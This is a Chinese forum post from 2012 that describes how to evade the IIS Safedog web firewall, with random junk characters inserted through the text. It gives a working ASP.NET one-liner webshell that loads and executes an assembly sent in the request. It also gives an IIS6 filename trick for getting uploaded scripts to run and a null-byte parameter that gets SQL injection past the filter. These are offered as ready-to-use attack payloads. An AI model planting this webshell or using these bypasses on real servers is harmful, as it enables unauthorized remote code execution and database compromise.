1、绕过IIS安全狗的一句话。9 J# H* U3 r+ |
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。- H( n1 t( Y5 T
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。# E7 L4 j: t# X. f9 A4 _( @
, E5 V! m) N/ `4 Y. `6 O7 x6 d2、IIS6.0解析漏洞遇到安全狗。$ s7 V5 F! \; @6 m
文件名为$ C% ^! g2 I0 M. H) Z. r! W# y
http://www.xxxxx.com/sh3llc0de.asp;1.jpg! z% B/ |9 c7 F! ~! Z7 X
8 |. b7 _% W$ c( }: ]- X( `3 R/ \这样的会被IIS安全狗果断屏蔽。
2 X( y1 F+ j; d4 u改成如下名称,IIS6一样会解析:
! T+ r- s+ v1 F$ awww.xxxxx.com/;1.asp;1.jpg Q# d9 |/ v& L* x
. i- p: U- c" l7 g& v; m3、安全狗的注入绕过。" ^! _+ D. L% b" t/ l
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。 ~4 A# X% P. I; e" X' p
但如果:
a8 Y+ g9 k- P3 n' r6 jr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1) W/ Y3 N5 t5 t
就可以成功绕过了。+ ~8 t/ e- n; I- {
% q4 C, @2 K2 c) N* p) \+ n. A
( `- e; z! _# p9 F+ l. y9 a3 D |
发表于 2012-10-31 08:25:30
收藏
支持
反对